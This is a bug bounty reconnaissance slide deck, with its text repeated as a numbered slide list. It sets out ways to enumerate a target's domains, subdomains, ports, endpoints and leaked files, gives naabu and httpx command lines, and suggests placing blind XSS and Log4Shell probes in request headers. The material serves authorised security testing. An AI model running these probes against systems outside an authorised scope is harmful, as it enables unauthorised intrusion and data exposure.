Bug bounty recon
@blindu_ch
https://www.blindu.ch
Eusebiu Daniel Blindu
Context is everything
● Recon is an iterative process
● Recon depends on the bug bounty program
● Recon depends of the scope (limitation)
Finding domains in scope
● Whois lookup
● Google search site:whois.* inurl:domain.com “org: Domain”
● Hurricane Electric (bgp.he.net)
● Shodan/Censys.io
● Acquisitions (crunchbase.com)
● Current and historic databases, documents, leaks and investigations
(aleph.occrp.org)
● Website profiler, lead generation, competitive analysis and business intelligence tools
(builtwith.com)
● IP ranges -> reverse dns -> domains/subdomains
● Domain search engines ( whoxy.com )
● Online scanning tools kaeferjaeger.gay
● SSL Certificate info
● Crawling the known domains/subdomains (Acunetix Discovery)
● https://dns.coffee/
● Amass (https://github.com/owasp-amass/amass ) `amass intel -org 'Netflix'`
● Github
Finding subdomains
● Existing tools: subfinder/sublist3r/amass
● Brute force subdomain scanner
● Crawling the known domains/subdomains that belong to same organization
● https://crt.sh/?q=domain.com
● https://securitytrails.com/list/apex_domain/domain.com
● https://www.shodan.io/search?query=ssl.cert.subject.CN%3Adomain.com
● Censys.io
● https://lab.dynamite.ai/ (search in public pcap files)
● Github
● Google/Bing search ‘site:domain.com’
● IP ranges -> reverse DNS
● https://github.com/iamthefrogy/frogy
● https://github.com/Cyber-Guy1/domainCollector
Cleaning
● Clean subdomains by same IP (keep max 1 to 3 subdomains that have same IP - with exceptions)
● Check the wildcard subdomains if it makes sense to continue with some of them
● Sort|uniq
● Grab screenshots or other techniques to group similar subdomains together to remove duplicate content
● Subdomains that don’t resolve to (a public) IP - separate from the main list, but keep it
Optional but userful: Continuous asset monitoring
Advantages: Some assets(domains, subdomains, ports) might be open at certain times (batch jobs,
deploys, test/UAT/staging/QA environments) - and might have lower security, exposing sensitive data
Disadvantages: could be a costly implementation
Port scanning
Nmap - main tool
cat subdomains.txt | httpx -o subdomains_live.txt
naabu -list subdomains.txt -top-ports 1000 -exclude-port 80,443,21,22,25 -o ports.txt
Some public/paid online websites have ports up to datte
Collecting URL endpoints
● Tools: waybackurls, gau
● Websites: urlscan.io, web.archive.org
● Google/Bing dorking site:domain.com
● Crawling: Scanners (Burp Suite crawl, Acunetix) hakrawler, Xenu
● Brute force: ffuf,dirbuster
● Javascript .js file source code
● Github
● Android/iOS mobile app
● Desktop app
● Public pcap files (lab.dynamite.ai)
Search backup/source code files
For https://subdomain.domain.com/ search for:
● https://subdomain.domain.com/subdomain.zip , https://subdomain.domain.com/subdomain.tar.gz,
● https://subdomain.domain.com/domain.zip, https://subdomain.domain.com/domain.tar.gz
● https://subdomain.domain.com/subdomain/subdomain.zip,
https://subdomain.domain.com/subdomain/subdomain.tar.gz
● https://subdomain.domain.com/domain/domain.zip,
https://subdomain.domain.com/domain/domain.tar.gz
Parameter mining
● Arjun
● ParamSpider
● Param-Miner (Burp)
● Also ffuf can be used too for param discovery
Leaks finding
● gist.github.com
● Gitlab.com
● site: docs.google.com/spreadsheets “company name”
● Site: groups.google.com/ “company name”
● Javascript files .js
● android/iOS source code
● Pcap uploaded by mistake publicly https://lab.dynamite.ai/
One bug found -> scan all your BB subdomains
● Keep a large list of subdomains/urls for multiple BB (preferable a database)
● Once you find a bug, scan all the urls for the same bug
● This can work out to find your favourite next bounty program
HTTP headers - manipulation
● Burp Proxy match/replace functionality
● Blind XSS/Log4Shell - UserAgent/Referal headers
● Modify response code
● Check for reverse proxy `GET https://burpcollab HTTP/1.1`
Scanner tips
● Feed previous gathered endpoints for a target to the scanner, not only the base url
● Combine tools: Use Acunetix/nuclei/ZAP via Burp Proxy/Fiddler with match/replace
● Intercept mobile app traffic , feed the scanner those requests
● Parse pcap public files for requests, feed the scanner
● Intercept SmartTV network traffic feed the scanner
Thank you!
@blindu_ch
https://www.blindu.ch
Eusebiu Daniel Blindu

Bug bounty recon.pdf

  • 1.
  • 2.
    Context is everything ●Recon is an iterative process ● Recon depends on the bug bounty program ● Recon depends of the scope (limitation)
  • 3.
    Finding domains inscope ● Whois lookup ● Google search site:whois.* inurl:domain.com “org: Domain” ● Hurricane Electric (bgp.he.net) ● Shodan/Censys.io ● Acquisitions (crunchbase.com) ● Current and historic databases, documents, leaks and investigations (aleph.occrp.org) ● Website profiler, lead generation, competitive analysis and business intelligence tools (builtwith.com) ● IP ranges -> reverse dns -> domains/subdomains ● Domain search engines ( whoxy.com ) ● Online scanning tools kaeferjaeger.gay ● SSL Certificate info ● Crawling the known domains/subdomains (Acunetix Discovery) ● https://dns.coffee/ ● Amass (https://github.com/owasp-amass/amass ) `amass intel -org 'Netflix'` ● Github
  • 4.
    Finding subdomains ● Existingtools: subfinder/sublist3r/amass ● Brute force subdomain scanner ● Crawling the known domains/subdomains that belong to same organization ● https://crt.sh/?q=domain.com ● https://securitytrails.com/list/apex_domain/domain.com ● https://www.shodan.io/search?query=ssl.cert.subject.CN%3Adomain.com ● Censys.io ● https://lab.dynamite.ai/ (search in public pcap files) ● Github ● Google/Bing search ‘site:domain.com’ ● IP ranges -> reverse DNS ● https://github.com/iamthefrogy/frogy ● https://github.com/Cyber-Guy1/domainCollector
  • 5.
    Cleaning ● Clean subdomainsby same IP (keep max 1 to 3 subdomains that have same IP - with exceptions) ● Check the wildcard subdomains if it makes sense to continue with some of them ● Sort|uniq ● Grab screenshots or other techniques to group similar subdomains together to remove duplicate content ● Subdomains that don’t resolve to (a public) IP - separate from the main list, but keep it
  • 6.
    Optional but userful:Continuous asset monitoring Advantages: Some assets(domains, subdomains, ports) might be open at certain times (batch jobs, deploys, test/UAT/staging/QA environments) - and might have lower security, exposing sensitive data Disadvantages: could be a costly implementation
  • 7.
    Port scanning Nmap -main tool cat subdomains.txt | httpx -o subdomains_live.txt naabu -list subdomains.txt -top-ports 1000 -exclude-port 80,443,21,22,25 -o ports.txt Some public/paid online websites have ports up to datte
  • 8.
    Collecting URL endpoints ●Tools: waybackurls, gau ● Websites: urlscan.io, web.archive.org ● Google/Bing dorking site:domain.com ● Crawling: Scanners (Burp Suite crawl, Acunetix) hakrawler, Xenu ● Brute force: ffuf,dirbuster ● Javascript .js file source code ● Github ● Android/iOS mobile app ● Desktop app ● Public pcap files (lab.dynamite.ai)
  • 9.
    Search backup/source codefiles For https://subdomain.domain.com/ search for: ● https://subdomain.domain.com/subdomain.zip , https://subdomain.domain.com/subdomain.tar.gz, ● https://subdomain.domain.com/domain.zip, https://subdomain.domain.com/domain.tar.gz ● https://subdomain.domain.com/subdomain/subdomain.zip, https://subdomain.domain.com/subdomain/subdomain.tar.gz ● https://subdomain.domain.com/domain/domain.zip, https://subdomain.domain.com/domain/domain.tar.gz
  • 10.
    Parameter mining ● Arjun ●ParamSpider ● Param-Miner (Burp) ● Also ffuf can be used too for param discovery
  • 12.
    Leaks finding ● gist.github.com ●Gitlab.com ● site: docs.google.com/spreadsheets “company name” ● Site: groups.google.com/ “company name” ● Javascript files .js ● android/iOS source code ● Pcap uploaded by mistake publicly https://lab.dynamite.ai/
  • 13.
    One bug found-> scan all your BB subdomains ● Keep a large list of subdomains/urls for multiple BB (preferable a database) ● Once you find a bug, scan all the urls for the same bug ● This can work out to find your favourite next bounty program
  • 14.
    HTTP headers -manipulation ● Burp Proxy match/replace functionality ● Blind XSS/Log4Shell - UserAgent/Referal headers ● Modify response code ● Check for reverse proxy `GET https://burpcollab HTTP/1.1`
  • 15.
    Scanner tips ● Feedprevious gathered endpoints for a target to the scanner, not only the base url ● Combine tools: Use Acunetix/nuclei/ZAP via Burp Proxy/Fiddler with match/replace ● Intercept mobile app traffic , feed the scanner those requests ● Parse pcap public files for requests, feed the scanner ● Intercept SmartTV network traffic feed the scanner
  • 16.